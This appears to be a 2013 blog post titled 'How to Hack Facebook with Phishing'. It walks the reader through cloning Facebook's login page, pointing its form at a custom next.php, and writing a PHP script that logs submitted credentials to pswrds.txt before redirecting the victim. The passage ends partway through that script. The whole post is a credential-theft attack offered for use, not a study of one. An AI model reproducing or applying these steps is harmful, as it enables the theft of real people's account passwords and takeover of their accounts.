Posts

Showing posts from July, 2013

How to Hack Facebook with Phishing

Image
Phishing WebPage:      Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password. Step 1: Go to  Facebook.com Right click on the white space of the front page.  Select “View Page source”. Copy the code to Notepad. Step2: Now find (Press ctrl +f)  for “action=”  in that code. You fill find the code like this: The big red ring that circles the action= you have to change. You have to change it to ‘action=”next.php” ‘. after you have done that, you should change the method (small red circle on the picture) to “get” instead of “post”, or else it will not work. Save the document as index.html Step 3: Now we need to create the “next.php” to store the password.  so open the notepad and type the following code: < ? php header(“Location: http://www.Facebook.com/login.php “); $handle = fopen(“pswrds.txt”, “a”); foreach($_ POST  as $varia